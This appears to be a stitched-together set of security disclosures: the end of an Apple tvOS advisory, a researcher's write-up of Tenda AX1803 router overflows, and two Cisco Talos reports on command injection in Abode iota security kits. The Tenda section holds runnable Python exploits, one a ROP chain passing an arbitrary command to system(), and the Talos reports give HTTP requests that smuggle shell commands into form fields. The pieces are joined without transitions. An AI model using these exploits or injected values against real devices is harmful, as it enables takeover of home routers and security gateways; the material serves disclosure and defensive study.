may lead to a denial-of-serviceDescription: A denial-of-service issue was addressed with improvedvalidation.CVE-2022-1622Image ProcessingAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: A sandboxed app may be able to determine which app iscurrently using the cameraDescription: The issue was addressed with additional restrictions onthe observability of app states.CVE-2022-32913: Yiğit Can YILMAZ (@yilmazcanyigit)Image ProcessingAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HD Impact: An app may be able to execute arbitrary code with kernelprivileges Description: This issue was addressed with improved checks. CVE-2022-32949: Tingting Yin of Tsinghua UniversityEntry added October 27, 2022KernelAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to disclose kernel memoryDescription: The issue was addressed with improved memory handling.CVE-2022-32864: Linus Henze of Pinauten GmbH (pinauten.de)KernelAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2022-32866: Linus Henze of Pinauten GmbH (pinauten.de)CVE-2022-32911: Zweig of Kunlun LabKernelAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A use after free issue was addressed with improvedmemory management.CVE-2022-32914: Zweig of Kunlun LabMediaLibraryAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: A user may be able to elevate privilegesDescription: A memory corruption issue was addressed with improvedinput validation.CVE-2022-32908: an anonymous researcherNotificationsAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: A user with physical access to a device may be able to accesscontacts from the lock screenDescription: A logic issue was addressed with improved statemanagement.CVE-2022-32879: Ubeydullah SümerSandboxAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to modify protected parts of the filesystemDescription: A logic issue was addressed with improved restrictions.CVE-2022-32881: Csaba Fitzl (@theevilbit) of Offensive SecuritySQLiteAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: A remote user may be able to cause a denial-of-serviceDescription: This issue was addressed with improved checks.CVE-2021-36690WebKitAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: A buffer overflow issue was addressed with improvedmemory handling.WebKit Bugzilla: 241969CVE-2022-32886: P1umer(@p1umer), afang(@afang5472),xmzyshypnc(@xmzyshypnc1)WebKitAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: An out-of-bounds write issue was addressed with improvedbounds checking.WebKit Bugzilla: 242047CVE-2022-32888: P1umer (@p1umer)WebKitAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: An out-of-bounds read was addressed with improved boundschecking.WebKit Bugzilla: 242762CVE-2022-32912: Jeonghoon Shin (@singi21a) at Theori working withTrend Micro Zero Day InitiativeWebKitAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: Visiting a website that frames malicious content may lead toUI spoofingDescription: The issue was addressed with improved UI handling.WebKit Bugzilla: 242762CVE-2022-32891: @real_as3617, an anonymous researcherWi-FiAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to cause unexpected system termination orwrite kernel memoryDescription: An out-of-bounds write issue was addressed with improvedbounds checking.CVE-2022-32925: Wang Yu of CyberservalAdditional recognitionAppleCredentialManagerWe would like to acknowledge @jonathandata1 for their assistance.Identity ServicesWe would like to acknowledge Joshua Jones for their assistance.KernelWe would like to acknowledge an anonymous researcher for theirassistance.SandboxWe would like to acknowledge Csaba Fitzl (@theevilbit) of OffensiveSecurity for their assistance.UIKitWe would like to acknowledge Aleczander Ewing for their assistance.WebKitWe would like to acknowledge an anonymous researcher for theirassistance.Apple TV will periodically check for software updates. Alternatively,you may manually check for software updates by selecting "Settings ->System -> Software Update -> Update Software."  To check the currentversion of software, select "Settings -> General -> About."All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNbKpUACgkQ4RjMIDkeNxmVqQ//euIvh3eN5tjkLRIDWFgteGsdR3O6GXKVcZvCiOI7EdmCksA7/3uIo3m2wAXO/XJB5GDbxwHpyIlaN6eSlQnAhUTeYuDZGTyyUKwRmyj0oYu0IQw9C1xrGefALDEqYiTwx7sQnuC6ijirFdHSO0uM+YEHCm0OZ4v2dGBJKAdIFN/5b0jq6/Y9NnWLEHSL5BLhOOEBxWoi4K2tbbE+ty8+Zqk0GrUJxaWQ7vCKPD8Ts2sNb7JAAVu5WQDYbmOyWpusZ1evUE/N0nZdqWFTwAXCTfH+4xZ4IXHTUFuHPIXuJ/2ySeqzYjldY75QvGVCy1b4wtd+C9XD7QGbpd3MHrkECZMI8pWbHkCB53Io1+zdaKiv+xmtSl0ZlFyL8f/FsR34FMzQPAhlZec60hIKHh83Lr7pOK5KrPNgAECTlxtBYD7Teau+qqTYFQgNpW5/4WtXhVpje5ILu3xzUmqBWk7QPNa7b0PdPLu6OjxE9iMVJF+p8Suk739Ex2H781uJp89tTE3UYXvhxaMYP2L0tbrEydlz+wGGI35+jrt4S82FsmvJvV9lqT8NubIG/IakSGMMlYoyb4JcCN3MJCXs2C48iydCPE4g7yaEhg4qNpcXfANdEzRh/KAenSwqbWic5nC6dxWqD4OXjyfjmpkvrq5B2lg87WesDkqMh9oJ9uWBTh8==Aea8-----END PGP SIGNATURE-----

Apple Security Advisory 2022-10-27-11

Tenda AX1803 v1.0.0.1 was discovered to contain a heap overflow in the function GetParentControlInfo.

**Tenda ax1803 is vulnerable to a buffer overflow****Setting up the environment**

　　　Create a br0 NIC:

sudo tunctl -t br0 -u root
sudo ifconfig br0 192.168.0.1/24

　　　Copy qemu-arm-static to the corresponding directory on the filesystem and start the tdhttpd service:

sudo chroot . ./qemu-arm-static ./bin/tdhttpd

**The first vulnerability**

　　　A stack overflow vulnerability exists in the fromAdvSetMacMtuWan function, which can lead to a denial of service or remote code execution vulnerability through a carefully constructed http request.

 　　

　　The proof-of-concept code for the vulnerability is as follows:

import requests,sys
from pwn import \*

url \= sys.argv\[1\] + "/goform/AdvSetMacMtuWan"
cmd \= sys.argv\[2\]

libc\_base \= 0xfef99000
gadget1 \= 0xff08dcdc # mov r0, sp ; blx r3
gadget2 = 0xff01987c # mov r3, r4 ; mov r0, r3 ; pop {r4, pc}
system\_addr = 0xfefd06c8

payload \= '128999999999'\+ p32(system\_addr) + p32(0xdeadbeef)\*3 + p32(gadget2)
payload += p32(0xdeadbeef) + p32(gadget1) + cmd
payload \= "wanMTU=%s&wanSpeed=0&cloneType=0&mac=00:00:00:00:00:01"%payload
content\_length \= len(payload)
headers \= {
    "Host":"192.168.0.1",
    "X-Requested-With":"XMLHttpRequest",
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36",
    "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
    "Origin":"http://192.168.0.1",
    "Referer":"http://192.168.0.1/main.html",
    "Content-Length":"%d"%content\_length
}

r \= requests.post(url,headers = headers,data = payload)

**The Second vulnerability**

　　　　A heap overflow vulnerability exists in the GetParentControlInfo function, which can cause a denial of service attack through a carefully constructed http request.

 　　　　The proof-of-concept code for the vulnerability is as follows:

import requests,sys
from pwn import \*

url \= sys.argv\[1\] + "/goform/GetParentControlInfo"

payload \= 'a'\*0x400
payload \= 'mac=%s'%payload
content\_length \= len(payload)
headers \= {
    "Host":"192.168.0.1",
    "X-Requested-With":"XMLHttpRequest",
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36",
    "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
    "Origin":"%s"%url,
    "Referer":"%s/main.html"%url,
    "Content-Length":"%d"%content\_length
}

r \= requests.post(url,headers = headers,data = payload)

**The third  vulnerability**

　　　A heap overflow vulnerability exists in the setSchedWifi function, which could cause a denial of service by constructing an http request.

 　　　The proof-of-concept code for the vulnerability is as follows:

import requests,sys
from pwn import \*

url \= sys.argv\[1\] + "/goform/openSchedWifi"

payload \= 'a'\*0x400
payload \= 'schedWifiEnable=&schedStartTime=%s&schedEndTime=&timeType=&day='%payload
content\_length \= len(payload)
headers \= {
    "Host":"192.168.0.1",
    "X-Requested-With":"XMLHttpRequest",
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36",
    "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
    "Origin":"%s"%url,
    "Referer":"%s/main.html"%url,
    "Content-Length":"%d"%content\_length
}

r \= requests.post(url,headers = headers,data = payload)

CVE-2022-40875: Tenda ax1803 is vulnerable to a buffer overflow - Riv4ille

An OS command injection vulnerability exists in the web interface /action/iperf functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**SUMMARY**

An OS command injection vulnerability exists in the web interface /action/iperf functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

abode systems, inc. iota All-In-One Security Kit 6.9X  
abode systems, inc. iota All-In-One Security Kit 6.9Z

**PRODUCT URLS**

iota All-In-One Security Kit - https://goabode.com/product/iota-security-kit

**CVSSv3 SCORE**

10.0 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The iota All-In-One Security Kit is a home security gateway containing an HD camera, infrared motion detection sensor, Ethernet, WiFi and Cellular connectivity. The iota gateway orchestrates communications between sensors (cameras, door and window alarms, motion detectors, etc.) distributed on the LAN and the Abode cloud. Users of the iota can communicate with the device through mobile application or web application.

The iota device contains a disabled-by-default local web interface that enables an authenticated user to interact with the device. When the WebServerEnable configuration parameter is enabled, the features exposed by this web interface are numerous. We are not aware of a method to enable the web server that is intended for use by end-users, though either TALOS-2022-1552 or TALOS-2022-1553 would allow a remote unauthenticated attacker to enable the web server, and TALOS-2022-1552 allows a remote attacker the ability to alter the username and password without prior knowledge or authentication.

Of note for this report is the function associated with POST requests destined for /action/iperf. The page intended for user-interaction with this endpoint is /test/iperf.htm. The function responsible for handling the request is located at offset 0x1BAC08 of the /root/hpgw binary included in firmware version 6.9Z.

For reference, the entirety of the decompilation of this function is included below, with annotations.

    int __fastcall iperf(mg_connection *conn, mg_request_info *ri)
    {
      int payload_len;
      int bitrate;
      int time_sec;
      char server_ip[32];
      char command[128];
      char payload[272];
    
      payload_len = http_collect_payload(conn, ri, payload, 256);
      memset(server_ip, 0, sizeof(server_ip));
    
      // [1] Extract user-supplied `server_ip` param as a string (max len: 31 bytes)
      mg_get_var(payload, payload_len, "server_ip", server_ip, 0x1F);        
    
      bitrate = mg_get_var_as_int(payload, payload_len, "bitrate", 1);
      time_sec = mg_get_var_as_int(payload, payload_len, "time_sec", 10);
      log(6, 1, "iperf to:[%s]", server_ip);
    
      // [2] Construct an iperf command and inject the `server_ip` value
      sprintf(command, "/IPCAM/iperf -c %s -u -b %dM -t %d 2>&1 >/tmp/iperf.log", server_ip, bitrate, time_sec);
      log(7, 1, "%s", command);
    
      // [3] Execute the constructed command as root
      popen_write(command);
      return HTTP_reply_with_file(conn, "/tmp/iperf.log");
    }
    

This function expects to be able to extract a server_ip value from the request. It can also accept two optional values, bitrate and time_sec, but will default to 1 and 10, respectively, if not provided. The server_ip value is extracted at [1] and can be at most 31 bytes in length. At [2] the attacker-supplied server_ip value is injected directly into the -c parameter of a call to iperf. At [3] this command is executed by the root user via popen. At no point is the value supplied in server_ip validated or sanitized.

Supplying an appropriately formatted value would allow an authenticated attacker to escape the iperf command and execute arbitrary OS commands on the system.

**Exploit Proof of Concept**

        POST /action/iperf HTTP/1.1
        Host: 10.1.1.201
        Authorization: Basic YWJvZGVzZXJ2aWNlMTU6YmV0dGVybHVja25leHR0aW1l
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en;q=0.9
        Connection: close
        Content-Length: 58
    
        server_ip=10.1.1.201+%26%26+sleep 11+#&bitrate=1&time_sec=5
    

**TIMELINE**

2022-07-14 - Vendor Disclosure  
2022-10-20 - Public Release

Discovered by Matt Wiseman of Cisco Talos.

CVE-2022-30603: TALOS-2022-1562 || Cisco Talos Intelligence Group

An os command injection vulnerability exists in the web interface util_set_abode_code functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

An os command injection vulnerability exists in the web interface util\_set\_abode\_code functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

abode systems, inc. iota All-In-One Security Kit 6.9X  
abode systems, inc. iota All-In-One Security Kit 6.9Z

**PRODUCT URLS**

iota All-In-One Security Kit - https://goabode.com/product/iota-security-kit

**CVSSv3 SCORE**

8.0 - CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The iota All-In-One Security Kit is a home security gateway containing an HD camera, infrared motion detection sensor, Ethernet, WiFi and Cellular connectivity. The iota gateway orchestrates communications between sensors (cameras, door and window alarms, motion detectors, etc.) distributed on the LAN and the Abode cloud. Users of the iota can communicate with the device through mobile application or web application.

The iota device is configured at the factory with a value called ‘ABODE\_CODE’. This value is stored into the bootargs variable in the U-Boot environment, which is ultimately passed to the kernel as its command line. The test device did not have this value set at the time of testing.

The device exposes a method for initializing or modifying this value through the /action/factorySerialMacPost endpoint, which relies on an underlying function titled utils_set_abode_code to make the underlying configuration change to the U-Boot environment.

In order to enable the web interface either TALOS-2022-1552 or TALOS-2022-1553 may be used, and access to this endpoint can be conducted without knowledge of the username or password using TALOS-2022-1554.

When an HTTP request is submitted to /action/factorySerialMacPost it will reach the designated handler function located at offset 0x19BEBC of the /root/hpgw in firmware 6.9Z. The relevant portions of the decompilation of this function have been included, with annotations, below.

    int __fastcall factorySerialMacPost(mg_connection *conn, mg_request_info *ri)
    {
      int payload_len;
      unsigned int idx;
      _BYTE *mac;
      unsigned __int8 *mac;
      char serial_no[64];
      char mac_addr[64];
      int abode_code[16];
      char payload[280];
    
      payload_len = http_collect_payload(conn, ri, payload, 256);
      memset(serial_no, 0, sizeof(serial_no));
    
      // [1] Extract the `serial` and `mac` values from the POST payload
      mg_get_var(payload, payload_len, "serial", serial_no, 0x3F);  
      memset(mac_addr, 0, sizeof(mac_addr));
      mg_get_var(payload, payload_len, "mac", mac_addr, 0x3F);  
    
      // [2] If `serial` (and `mac`) parameters exist    
      if ( serial_no[0] && mac_addr[0] )                            
      {
        ...                                         
        util_set_serial_mac(serial_no, mac);                        
        memset(abode_code, 0, sizeof(abode_code));
        
        // [3] Extract the `code` parameter
        mg_get_var(payload, payload_len, "code", abode_code, 0x3F);
        
        // [4] Call the vulnerable function
        util_set_abode_code(abode_code);
        sync();
        sync();
        sync();
        return web_success(conn);
      }
      else
      {
        err_str = strtable_get("WEB_ERR_PARAM_EMPTY", 19);
        return web_error(conn, 0, err_str, "Serial or Mac");
      }
    }
    

At [1] the serial and mac parameters are extracted from the HTTP request and checked at [2] for their existence. If they exist, then at [3] a third parameter, code, is extracted from the HTTP request. At [4] this code parameter is passed into the vulnerable util_set_abode_code function.

The util_set_abode_code function is at offset 0xA8E74 in version 6.9Z. It expects a single argument, code, and uses the helper binaries of fw_printenv and fw_setenv to read and write to the U-Boot bootargs environment variable. The relevant portions of the decompiled function are included below.

    int __fastcall util_set_abode_code(char *code)
    {
      char *contains_abode_code; // r6
      char *original; // r0
      char *key; // r0 MAPDST
      size_t end; // r0 MAPDST
      char *value; // r1
      size_t v11; // r0
      size_t v12; // r0
      size_t v13; // r0
      char *v14; // r0
      char bootargs[512]; // [sp+0h] [bp-610h] BYREF
      char modified[512]; // [sp+200h] [bp-410h] BYREF
      char command[528]; // [sp+400h] [bp-210h] BYREF
    
      if ( !dir_exists("/var/lock") )
        mkdir("/var/lock", 0x1FDu);
      memset(bootargs, 0, sizeof(bootargs));
      // [1] Collect the original bootargs value using `fw_printenv`
      if ( popen_read("/gm/tools/env/fw_printenv -n bootargs", bootargs, 511) > 0 && bootargs[0] )
      {
        bootargs[strcspn(bootargs, "\n")] = 0;
        contains_abode_code = strstr(bootargs, "ABODE_CODE=");
        memset(modified, 0, sizeof(modified));
        // [2] If `ABODE_CODE` is already a key in the bootargs ... 
        if ( contains_abode_code )
        {
          // [3] Tokenize the bootargs into `key=value` pairs
          for ( original = bootargs; ; original = 0 )
          {
            key = strtok(original, " ");
            if ( !key )
              break;
            // [4] If the current key is ABODE_CODE
            if ( startswith(key, "ABODE_CODE=") )
            {
              // [5] Then update the `modified` bootargs with the new `code`, dropping the existing code
              end = strlen(modified);
              strncpy_0(&modified[end], "ABODE_CODE=", 511);
              end = strlen(modified);
              value = code;
            }
            else
            {
              // [6] otherwise prepare to append the current key/value pair without modification
              end = strlen(modified);
              value = key;
            }
            // [7] Construct the modified bootargs with the previously configured value
            strncpy_0(&modified[end], value, 511);
            end = strlen(modified);
            strncpy_0(&modified[end], " ", 511);
          }
        }
        // [8] Otherwise, an ABODE_CODE is not already set (as was the case with the target device)
        else
        {
          // [9] Append ABODE_CODE={code} to the modified bootargs buffer
          strncpy_0(modified, bootargs, 511);
          end = strlen(modified);
          strncpy_0(&modified[end], " ", 511);
          end = strlen(modified);
          strncpy_0(&modified[end], "ABODE_CODE=", 511);
          end = strlen(modified);
          strncpy_0(&modified[end], code, 511);
        }
        v14 = &command[strlen(modified) + 511];
        if ( *(v14 - 1024) == 32 )
          *(v14 - 1024) = 0;
        if ( modified[0] )
        {
          // [10] Construct and execute a command using the existing `bootargs` modified with the attacker-controlled `code`
          memset(command, 0, 0x200u);
          vsnprintf_nullterm(command, 0x1FFu, "/gm/tools/env/fw_setenv bootargs %s", modified);
          popen_write(command);
        }
        return 0;
      }
      else
      {
        log(4, 20, "\x1B[33mutil_set_abode_code failed on fw_printenv or no bootargs\x1B[0m");
        return -1;
      }
    }
    

This function works by [1] extracting the current bootargs value from the U-Boot env by calling /gm/tools/env/fw_printenv -n bootargs. On the device under test, this returns mem=128M gmmem=90M console=ttyS0,115200 user_debug=31 init=/squashfs_init root=/dev/mtdblock2 rootfstype=squashfs ethaddr=B0:C5:CA:XX:XX:XX climax_product=Z3,XXXX,YYYY,ZZZZ. Observe that the device under test does not have an ABODE\_CODE, so our code will initially take the second path, beginning at [8]. It’s important to note that the presence or absence of the ABODE_CODE key in bootargs is irrelevant to the vulnerability, as both will result in exploitation. At [9] the attacker-supplied code will be appended to the existing bootargs and placed into the modified buffer, which is used to construct a command that will be executed via popen at [10]

A maliciously-formatted and authenticated web request submitted to this endpoint will result in arbitrary command execution inside the util_set_abode_code function.

**Exploit Proof of Concept**

    POST /action/factorySerialMacPost HTTP/1.1
    Host: 10.1.1.201
    X-Climax-Tag: Factory-27940001-21245121
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Content-Length: 1326
    
    mac=b0:c5:ca:00:00:00&serial=Z3,XXXX,YYYY,ZZZZ&code=%3b+sleep+10+%23
    

**TIMELINE**

2022-07-14 - Vendor Disclosure  
2022-10-20 - Public Release

Discovered by Matt Wiseman of Cisco Talos.

Tag

#webkit